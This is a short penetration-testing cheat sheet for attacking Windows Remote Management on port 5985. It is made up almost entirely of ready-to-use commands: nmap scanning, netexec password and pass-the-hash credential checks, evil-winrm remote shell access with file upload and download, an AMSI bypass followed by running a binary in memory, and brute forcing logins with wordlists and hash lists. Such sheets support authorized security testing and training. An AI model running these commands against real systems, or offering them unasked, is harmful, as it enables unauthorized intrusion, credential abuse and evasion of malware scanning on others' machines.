5985 - WinRM
Information
Default Port: 5985
PORT STATE SERVICE
5985/tcp open wsman
Enumeration
nmap -p5985 -sS 192.168.1.2
nmap -p5985 -sVC 192.168.1.2
Check Credentials
# password
netexec winrm 192.168.1.2 -u administrador -p Password1
netexec winrm 192.168.1.2 -u administrador -p Password1 --local-auth
# hash
netexec winrm 192.168.1.2 -u administrator -H <HASH>
netexec winrm 192.168.1.2 -u administrator -H <HASH> --local-auth
Connect
# gem install evil-winrm
evil-winrm -i 192.168.1.2 -u administrator -p Password1 # password
evil-winrm -i 192.168.1.2 -u administrator -H <HASH> # hash
File Transfer
Evil-WinRM PS C:\Windows\Temp> upload <FILE> # upload
Evil-WinRM PS C:\Windows\Temp> download <FILE> # download
AMSI (Bypass)
Evil-WinRM PS C:\Windows\Temp> menu
Evil-WinRM PS C:\Windows\Temp> Bypass-4MSI
Evil-WinRM PS C:\Windows\Temp> Invoke-Binary /home/kali/binary.exe
Brute Force
netexec winrm 192.168.1.2 -u users.dic -p Password1 # user
netexec winrm 192.168.1.2 -u administrador -p rockyou.txt # password
netexec winrm 192.168.1.2 -u administrador -H hashes.txt # hash